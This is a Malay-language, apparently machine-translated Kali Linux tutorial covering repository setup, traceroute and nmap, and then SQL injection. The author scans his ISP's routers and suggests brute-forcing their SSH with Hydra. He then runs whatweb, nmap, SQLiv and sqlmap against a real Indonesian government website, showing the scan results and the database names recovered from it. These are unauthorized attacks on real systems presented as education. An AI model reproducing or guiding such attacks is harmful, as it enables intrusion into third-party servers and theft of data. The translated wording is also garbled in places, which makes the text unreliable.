Tutorial Kali Linux

Kali Linux Tutorial



Sekiranya anda seorang pakar atau paling tidak mengetahui Linux, perintah dan persekitaran, baru sahaja memasang Kali Linux pada mesin anda, ingin menjadi Master Kali Linux atau Hacker Etika maka anda berada di tempat yang tepat. Dalam artikel ini, saya akan membahas tutorial Kali Linux untuk pengguna Linux yang belum biasa dengan Kali dan anda akan memulakan beberapa teknik asas yang digunakan untuk penggodaman dan ujian keselamatan semasa menggunakan Kali.

Apa itu Kali Linux?

Kali Linux, ( pertama kali dikeluarkan pada 13 Mac 2013 ) yang secara formal dikenal sebagai BackTrack, yang dikembangkan oleh firma keselamatan Offensive Security, adalah distribusi yang berfokus pada forensik dan keselamatan berdasarkan cabang Pengujian Debian. Kali Linux dirancang dengan mempertimbangkan ujian penembusan, pemulihan data dan pengesanan ancaman. Projek ini beralih ke model peluncuran bergulir awal tahun ini dalam usaha untuk menyediakan utiliti keselamatan yang lebih terkini kepada pengguna pengedaran. Kali Linux percuma, dan akan sentiasa ada. Ia mempunyai 600+ alat ujian penembusan yang disertakan.







Mengapa Kali Linux? Adakah sesuai untuk anda?

Kali Linux telah mendapat banyak populariti baru-baru ini. Dan ada sebab di sebalik itu. Penggodaman kembali sebagai perkara menarik dalam budaya popular dan ini dapat dikaitkan dengan siri TV Mr. Robot. Populariti Mr. Robot membantu Kali Linux dalam mendapatkan pengguna baru. Orang yang hampir tidak mempunyai pengetahuan mengenai Linux atau apa-apa yang berkaitan dengan keselamatan komputer kini cuba menggunakan Kali sebagai pengedaran Linux utama mereka.



Taburan Ujian Penembusan Paling Canggih Kami, Pernah. - Pembangun Kali Linux. (Ia ditulis di halaman utama Kali.org di bahagian paling atas halaman.) Apa yang anda dapat dari pernyataan itu? Adakah anda melihat ini: APTD (Pengedaran Ujian Penetrasi Lanjutan)? Tidak ada istilah penggodaman di sini secara harfiah. Kali Linux sama dengan pengedaran Linux yang lain. Ringkasnya, ini adalah sebaran Linux yang dilengkapi dengan alat yang berkaitan dengan keselamatan dan disasarkan kepada pakar keselamatan rangkaian dan komputer. Walau bagaimanapun, penggunaan Kali Linux hanya menumpukan pada keselamatan dan forensik.



Pengedaran Linux tidak lebih dari sekumpulan yang mengandungi kernel Linux, sekumpulan utiliti dan aplikasi teras dan beberapa tetapan lalai. Oleh itu, Kali Linux tidak menawarkan sesuatu yang unik dalam arti sebilangan besar alat yang disediakan dapat dipasang pada sebarang pengedaran Linux.





Kali Linux secara khusus diarahkan untuk memenuhi keperluan ujian penembusan profesional dan audit keselamatan. Ini ditujukan untuk subset pengguna Linux tertentu. Pentesters, penggodam, dan lain-lain. Ini bukan pengedaran yang disyorkan jika anda mengharapkan Kali untuk desktop Linux untuk pembangunan umum, reka bentuk web, permainan, pejabat, dll. Kali mungkin memberi anda beberapa cabaran, walaupun anda adalah pengguna Linux yang berpengalaman .

PERKARA YANG PERLU DILAKUKAN SELEPAS MEMASANG KALI LINUX

Selepas memasang Kali Linux, anda mungkin tertanya-tanya apa yang harus dilakukan seterusnya dengan ini, bukan ?. Semua orang menghadapi masalah ini, jangan risau.



LANGKAH 1: SIAPKAN LAPORAN

Pertama, anda mungkin sudah mengetahui perkara ini, tetapi sangat penting untuk menetapkan repositori dengan betul. Seperti yang saya katakan, model peluncuran bergulir Kali Linux dalam usaha untuk menyediakan utiliti keselamatan yang lebih terkini kepada pengguna pengedaran. Secara umumnya, jika anda memasang Kali Linux baru, repositori merujuk pada media yang anda gunakan untuk memasang. Untuk memperbaikinya, anda perlu menukar repositori ke repositori Kali Linux rasmi. Fail yang diperlukan terletak di bawah /etc/apt/sources.list . Buka fail dengan editor teks daun daun dan ganti repositori lalai ke repositori Kali Rolling rasmi ini:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

LANGKAH 2: KEMASKINI DAN TINGKATKAN KALI LINUX ANDA

Selepas itu kemas kini dan tingkatkan sistem anda, segerakkan Kali Linux anda ke versi terkini. Untuk melakukannya, buka terminal, dan taip:

apt update -y && apt upgrade -y && apt dist-upgrade 

Perintah kemas kini tepat memuat turun dan mengambil pakej yang menyenaraikan maklumat dari repositori dan mengemas kini untuk mendapatkan maklumat mengenai versi terbaru pakej dan pergantungannya.

Perintah peningkatan tepat memuat turun dan memasang versi baru pakej Kali Linux yang terpasang selagi ia tidak mempunyai ralat kebergantungan.

Up-dist-upgrade akan mengemas kini semua pakej ke versi terbaru yang tersedia tidak kira apa. Dan juga pasang dan hapus kebergantungan yang diperlukan (pasang dependensi untuk memenuhi pakej, tentu saja, tetapi juga hapus pergantungan yang menjadi yatim jika pakej yang dikemas kini tidak lagi memerlukan ketergantungan.

KONSEP UJIAN PENETRASI ASAS DENGAN KALI LINUX

Setelah berjaya melakukan langkah-langkah tersebut, ada tiga perkara utama yang dapat anda lakukan dengan Kali Linux berdasarkan sistem yang disasarkan termasuk:

  1. Penggodaman Rangkaian Tanpa Wayar - Peretasan Wifi, Phising, Keracunan ARP, dll.
  2. Penggodaman Aplikasi Web - SQL Suntikan, Pemalsuan Permintaan Merentas Tapak (CSRF), Web Phising, dll.
  3. Penggodaman Peranti - Eksploitasi mesin sasaran untuk mengawalnya.

Saya tidak termasuk penggodaman IoT, ini tidak bermaksud Kali Linux tidak mempunyai kemampuan untuk tujuan tersebut. Tetapi, secara harfiah itu juga milik Peretasan Peranti. Oleh kerana peranti mempunyai rupa dan bentuk fizikal. Dalam tutorial ini saya merangkumi pengetahuan asas mengenai mereka. Oleh kerana, Kali Linux sangat besar, ia tidak sesuai dalam satu artikel!

Anda juga perlu tahu, Kitaran atau prosedur Penetrasi Ujian. Mereka adalah:

  1. Pengintaian - Pengumpulan Maklumat
  2. Mengimbas
  3. Operasi
  4. Pasca Eksploitasi

HACKING RANGKAIAN WIRELESS DENGAN KALI LINUX

Dari segi penggodaman rangkaian Tanpa Wayar, mangsa mungkin berbeza. Kerana, rangkaian tanpa wayar terdiri daripada beberapa perkara, seperti ISP (Internet Service Provider), router dan rakannya (modem, hub, switch, dll) dan pelanggan (pengguna, CCTV, komputer jauh, dll). Mereka juga mempunyai kemungkinan terdedah.

Internet adalah gabungan perkakasan rangkaian yang besar dan kompleks, dihubungkan bersama oleh pintu masuk. Menjejaki laluan yang diikuti paket anda adalah penting untuk mengetahui bagaimana anda mencapai nama host atau alamat IP sasaran tertentu.

Kali Linux mempunyai alat bawaan yang disebut Traceroute. Traceroute menggunakan masa protokol IP untuk hidup di lapangan dan berusaha untuk mendapatkan respons ICMP TIME_EXCEEDED dari setiap pintu masuk sepanjang jalan ke beberapa hos. Traceroute mencuba laluan yang akan diikuti oleh paket IP ke beberapa hos internet dengan melancarkan paket probe dengan TTL kecil (masa untuk hidup) kemudian mendengar masa ICMP melebihi balasan dari pintu masuk. Saya akan memberi anda dan contoh bagaimana mengesan penghala ISP yang digunakan untuk mengendalikan sambungan kami menggunakan Traceroute.

1. Pengiktirafan

Pengumpulan maklumat adalah permulaan lompatan yang paling penting, jangan lewatkan langkah ini. Dalam langkah ini, tujuan kami adalah untuk memperoleh sebanyak mungkin maklumat berguna yang kami dapat, dan kemudian maklumat ini digunakan untuk langkah selanjutnya.

Pertama, buka terminal dan ketik perintah ini untuk mula menelusuri jalan ke laman web, dalam hal ini saya menetapkan laman web ke google.com.

traceroute google.com 

Tangkapan Skrin Traceroute

2. Mengimbas

Sebaik sahaja kami melancarkan perintah, ia akan menyenaraikan di mana paket kami berjalan mengikut urutan. Seperti yang anda lihat di atas, saya mendapat 3 hop yang salah satunya adalah pelayan ISP saya. IP pertama dalam senarai adalah penghala saya, yang berfungsi sebagai pintu masuk. Dan dua daripadanya adalah milik ISP saya. Sekarang mari kita periksa perkhidmatan yang mereka jalankan menggunakan Nmap. Jadi, sasaran yang akan kita imbas adalah 10.152.192.1 dan 10.13.223.102 . Di terminal saya menjalankan arahan berikut:

nmap -v -sS [IP Target] -Pn 

Mari kita pecahkan hujah perintah:

-v = Dayakan mod verbosity

-sS = Gunakan teknik imbasan TCP SYN

-Pn = Perlakukan semua host sebagai dalam talian - langkau penemuan host

Dan inilah hasil yang kami dapat.

tangkapan skrin nmap 2

Malangnya, semua port dihidupkan 10.152.192.1 ditapis, ini bermaksud semua sambungan TCP yang masuk disekat oleh IDS atau Firewall di IP ini. Sekarang, mari buat imbasan lain ke sasaran kedua.

tangkapan skrin nmap 1

3. Operasi

Dalam prosedur ini, saya tidak bermaksud melakukan eksploitasi sebenar, sebaliknya saya menunjukkan caranya. Berdasarkan hasil imbasan Nmap di atas, kita tahu bahawa IP ini mempunyai pelayan SSH yang berjalan di port 22, dan ia terbuka. Ia terbuka untuk menjadi kasar, haha! Kami menjumpai lubang, pelayan SSH ini adalah kemungkinan lubang yang boleh kami cuba dapatkan. Terdapat beberapa alat di Kali Linux yang menyokong serangan bruteforce atau kamus terhadap protokol SSH. Yang paling popular dan hebat ialah Hydra.

Ok, itu adalah prosedur asas melakukan ujian penembusan terhadap pelayan yang disasarkan, yang dalam contoh kami di sini adalah pelayan ISP saya.

APLIKASI WEB HACKING DENGAN KALI LINUX

Sebenarnya, jika anda berminat dengan ini, anda boleh mengatur persekitaran penggodaman anda dengan memasang DWVA (Damn Vulnerable Web App) ke Kali Linux anda. Ini adalah aplikasi web PHP / MySQL yang mempunyai banyak lubang yang rentan. Matlamat utamanya adalah menjadi bantuan bagi profesional keselamatan untuk menguji kemahiran dan alat mereka dalam lingkungan undang-undang, dan membantu pembangun web memahami proses mengamankan aplikasi web dengan lebih baik. Anda boleh mendapatkan DWVA secara percuma di Github di sini: https://github.com/ethicalhack3r/DVWA.

Buat masa ini saya akan menunjukkan kepada anda cara melakukan Peretasan Aplikasi Web di laman web sebenar. Tapi, janji saya hanya terhad untuk tujuan pendidikan sahaja. Kami akan mensimulasikan serangan sebenar di laman web sebenar menggunakan suntikan SQL.

Prasyarat

Alat yang diliputi:

- Whatweb (pra-pemasangan)

- Nmap (dipasang sebelumnya)

- SQLiv (pasang secara manual)

- SQLMap (pra-pemasangan)

Kami memerlukan satu lagi alat tambahan yang terdapat di Github di sini: https://github.com/Hadesy2k/sqliv, pasangkannya terlebih dahulu ke Kali Linux kami. Alat ini bernama SQLiv yang mampu melakukan pengimbasan yang disasarkan dengan menyediakan domain tertentu (dengan merangkak). Taipkan terminal:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Sasaran: www.trenggalekkab.go.id

1. Pengiktirafan

Kumpulkan seberapa banyak maklumat berguna yang kami dapat. Kami dapat membuka laman web dan mengesan aplikasi apa yang sedang berjalan di laman web ini. Pertama, mari kita periksa jenis laman web apa. Kami akan menggunakan whatweb untuk melakukannya.

whatweb www.trenggalekkab.go.id 

Tangkapan Skrin Web Apa

Seperti yang anda lihat hasilnya di atas, sasarannya terletak di Indonesia. Ia sedang berjalan Apache v2.2.27 di pelayan laman webnya dan juga mempunyai PHP v5.4.31 , ia mempunyai alamat IP 103.247.21.142 . Baiklah, perhatikan perkara itu. Anda mungkin perlu melayari laman webnya, mencari fail atau halaman yang dibina, parameter URL, atau bahkan borang log masuk. Buat masa ini kita memerlukan alamat IP untuk langkah seterusnya iaitu mengimbas.

2. Mengimbas

Seperti sebelumnya, kami menggunakan Nmap sekali lagi untuk mengimbas port dan perkhidmatan apa yang dijalankan pada sasaran.

nmap -v -sS 103.247.21.142 

Dan inilah hasil yang kami dapat:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Terdapat sekumpulan port terbuka yang menangani setiap perkhidmatan pada sasaran, tetapi yang kelihatan menarik adalah bahawa perkhidmatan mysql di port 3306. Ini menunjukkan bahawa laman web ini menggunakan mysql untuk menguruskan maklumat mereka dalam pangkalan data. Kemudian, saya tertanya-tanya adakah kelemahan SQL Injection di laman web ini. Oleh itu, saya mengimbas kembali laman web ini menggunakan SQLiv yang baru sahaja kita pasang. Saya menaip arahan:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Kami menemui 2 kemungkinan URL rentan SQL di laman web ini. Perhatikan URL tersebut.

3. Operasi

Ok, kami mempunyai URL rentan SQL, dan siap untuk dilaksanakan. Untuk melakukan itu, kita akan menggunakan SQLMap. Sintaksnya adalah:

sqlmap [Vulnerable URL] --dbs 

Perintah itu akan kelihatan seperti ini:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argumen –dbs adalah memberitahu SQLMap untuk mendapatkan pangkalan data sasaran. Inilah output yang kami dapat:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap menemui 2 pangkalan data, tetapi hanya satu di antaranya yang mengandungi data sensitif, seperti akaun pentauliahan pentadbir. Itu ada di trengkab_trg. Setelah kita menemui pangkalan data, masih ada langkah lain yang harus kita lakukan. Iaitu mencari jadual dan lajur dan langkah terakhir adalah membuang data. Saya tidak akan menunjukkan kepada anda bagaimana di bahagian ini, menggunakan sasaran ini. Sekurang-kurangnya anda tahu idea asas pada kitaran serangan, dan menggunakan beberapa alat.

HACKING PERANTI

Dalam artikel yang akan datang di laman web ini, kami akan membahas penggodaman peranti, nantikan. Sebagai pra-amaran anda pasti ingin memastikan anda mengetahui sebilangan Python untuk perkara ini.